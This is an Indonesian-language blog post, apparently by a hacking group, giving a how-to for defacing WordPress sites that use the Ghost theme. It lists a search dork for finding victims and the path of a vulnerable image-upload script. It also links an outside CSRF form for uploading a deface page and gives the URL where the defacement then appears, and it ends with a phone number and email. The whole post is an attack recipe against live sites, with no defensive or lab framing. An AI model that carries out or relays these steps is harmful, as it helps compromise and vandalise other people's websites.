Cara Deface Poc wp ghost theme
Rabu, 20 Mei 2020
DEFACE POC WP GHOST THEME
[$]===================[$]
BAHAN BAHAN
-Dork
-Exploit
-csrf
-script deface
[$]===================[$]
Dork:
inurl:wp-content/themes/Ghost/
Exploit:
/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
Akses file?
wp-content/uploads/settingsimages/scriptmu.html
Csrf? https://earthseed.space/csrf.php
LANGKAH 1 :
Dorking dulu menggunakan dork diatas
LANGKAH 2 :
kalau sudah dapet target kalian masukan exploitnya
LANGKAH 3 :
Kalau sudah masukan Exploit nya, kalau tampilan nya seperti dibawah berarti vuln
LANGKAH 3 :
Kalian langsung salin yang sudah di exploit lalu ke csrf nya
Di atas kalian isi dengan web yang kalian salin tdi , dan bawahnya tulis Filedata,lalu lock target,
LANGKAH 4 :
kalian tinggal pilih file deface kalian
Lalu tekan tombol upload.
LANGKAH 5 :
Kalau tampilan nya seperti dibawah setelah upload berarti berhasil
Kalian tinggal akses hasil deface nya caranya?
http://targetlo.com/wp-content/uploads/settingsimages/scriptmu.html
SEKIAN MATERI KALI INI SEMOGA BERMANFAAT
CONTACT US :
WhatsApp. : 081377804838
Gmail. : mynamehjk12@gmail.com
© Copyright [$] FORCE CYBER TEAM [$]